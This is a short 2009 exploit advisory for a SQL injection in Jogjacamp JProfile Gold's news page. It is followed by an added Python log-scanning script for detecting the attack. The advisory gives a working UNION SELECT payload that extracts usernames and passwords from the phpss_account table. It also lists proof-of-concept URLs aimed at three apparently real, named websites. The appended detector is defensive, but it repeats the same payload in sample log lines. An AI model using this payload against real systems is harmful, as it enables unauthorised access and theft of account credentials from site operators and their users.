# Title : Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
# Published : 2009-03-03
# Author : kecemplungkalen
###############################################################
Jogjacamp JProfile Gold SQL Injection
by kecemplungkalen
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
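
Added example, not part of the original advisory: a check a site operator could run over web server access logs to find requests of the kind shown above. It flags any `action=news.detail` request whose `id_news` is not purely numeric and records the SQL tokens and the `phpss_account` table name from the advisory's payload; the log lines, IP addresses, function names and the combined log format are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens seen in the advisory's payload; matched after URL decoding.
SQL_MARKERS = re.compile(r"\b(?:union|select|concat|from)\b|--|0x[0-9a-f]+", re.I)
ACCOUNT_TABLE = "phpss_account"  # table named in the advisory

def check_line(line):
    """Return a finding dict for a suspicious news.detail request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "news.detail" not in params.get("action", []):
        return None
    for value in params.get("id_news", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # a legitimate article id is digits only
        markers = sorted({t.group(0).lower() for t in SQL_MARKERS.finditer(value)})
        return {
            "client": line.split()[0],
            "id_news": value,
            "markers": markers,
            "targets_accounts": ACCOUNT_TABLE in value.lower(),
            "severity": "high" if markers else "low",
        }
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and keep the findings."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation IP range, no real host).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2009:10:00:01 +0700] "GET /index.php?action=news.detail&id_news=6 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [03/Mar/2009:10:00:09 +0700] "GET /index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- HTTP/1.1" 200 5344',
    '192.0.2.11 - - [03/Mar/2009:10:00:15 +0700] "GET /index.php?action=news.detail&id_news=abc HTTP/1.1" 200 812',
    '192.0.2.12 - - [03/Mar/2009:10:00:20 +0700] "GET /index.php?action=home HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding that also has `targets_accounts` set means the request tried to read the account table, so the credentials stored there should be treated as exposed and rotated.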
###############################################################
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew, stop gaming all the time :p